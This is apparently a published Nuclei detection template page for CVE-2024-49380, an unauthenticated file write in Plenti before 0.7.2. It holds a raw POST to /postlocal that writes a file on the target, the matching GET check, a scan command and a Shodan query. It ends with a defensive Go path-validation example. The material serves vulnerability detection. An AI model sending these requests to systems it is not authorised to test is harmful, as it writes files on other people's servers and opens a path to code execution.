Plenti < v0.7.2 - OS Command Injection
ID: CVE-2024-49380
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,plenti,rce,injection,intrusive
Description
Plenti, a static site generator, has an arbitrary file write vulnerability in versions prior to 0.7.2. The /postLocal endpoint is vulnerable to an arbitrary file write vulnerability when a Plenti user serves their website. This issue may lead to Remote Code Execution. Version 0.7.2 fixes the vulnerability.
YAML Source
id: CVE-2024-49380

info:
  name: Plenti < v0.7.2 - OS Command Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Plenti, a static site generator, has an arbitrary file write vulnerability in versions prior to 0.7.2. The `/postLocal` endpoint is vulnerable to an arbitrary file write vulnerability when a plenti user serves their website. This issue may lead to Remote Code Execution. Version 0.7.2 fixes the vulnerability.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2024-297_GHSL-2024-298_plenti/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-49380
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-49380
    cwe-id: CWE-78
    epss-score: 0.00046
    epss-percentile: 0.17681
  metadata:
    max-request: 2
    verified: true
    shodan-query: title:"Plenti"
  tags: cve,cve2024,plenti,rce,injection,intrusive

variables:
  filename: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /postlocal HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        [{"Action": "create","Contents":"{{randstr}}","File": "static/{{filename}}.txt"}]
      - |
        GET /{{filename}}.txt?{{wait_for(5)}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "{{randstr}}")'
          - 'contains(header_2, "text/plain")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4b0a0048304602210084f54770e09b1af141a062bf2af35b4a9ec33e88448b9557c96c5c7141a5d482022100dd370aca140349dbdcf224589f950c60c5b3d2b8d2878e1022bf735759c5dd8d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
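This template is run with the Nuclei tool. It sends the two requests in the YAML source and reports a match only when the second response has status 200, a text/plain content type, and a body containing the random string written by the first request. The first request creates a file under static/ on the target; the template carries the intrusive tag.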
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-49380.yaml"
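
For the defensive side of the arbitrary file write described above, here is an added example (not Plenti's code and not the 0.7.2 patch): a Go check for request bodies shaped like the template's POST, accepting a write only when the File value stays inside one allowed directory. The directory name content and the names change, underDir and checkBody are assumptions made for illustration.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// change mirrors one object of the JSON array in the template's POST body.
type change struct{ Action, Contents, File string }

var errOutside = errors.New("path outside allowed directory")

// underDir lexically cleans file and accepts it only inside allowedDir (symlinks are not resolved).
func underDir(allowedDir, file string) (string, error) {
	if file == "" || filepath.IsAbs(file) {
		return "", errOutside
	}
	clean := filepath.Clean(file) // collapses "." and ".." segments
	rel, err := filepath.Rel(allowedDir, clean)
	if err != nil || rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errOutside
	}
	return clean, nil
}

// checkBody returns the write targets of a body, rejecting the whole batch if one entry leaves allowedDir.
func checkBody(allowedDir string, body []byte) ([]string, error) {
	var changes []change
	if err := json.Unmarshal(body, &changes); err != nil {
		return nil, fmt.Errorf("invalid JSON: %w", err)
	}
	targets := make([]string, 0, len(changes))
	for _, c := range changes {
		p, err := underDir(allowedDir, c.File)
		if err != nil {
			return nil, fmt.Errorf("%q: %w", c.File, err)
		}
		targets = append(targets, p)
	}
	return targets, nil
}

func main() { // constructed body in the template's shape; "content" is an assumed policy
	_, err := checkBody("content", []byte(`[{"Action":"create","Contents":"x","File":"static/probe.txt"}]`))
	fmt.Println("rejected:", err != nil)
}
```

The check is lexical only; a deployment that allows symlinks inside the permitted directory would also need to resolve them before writing.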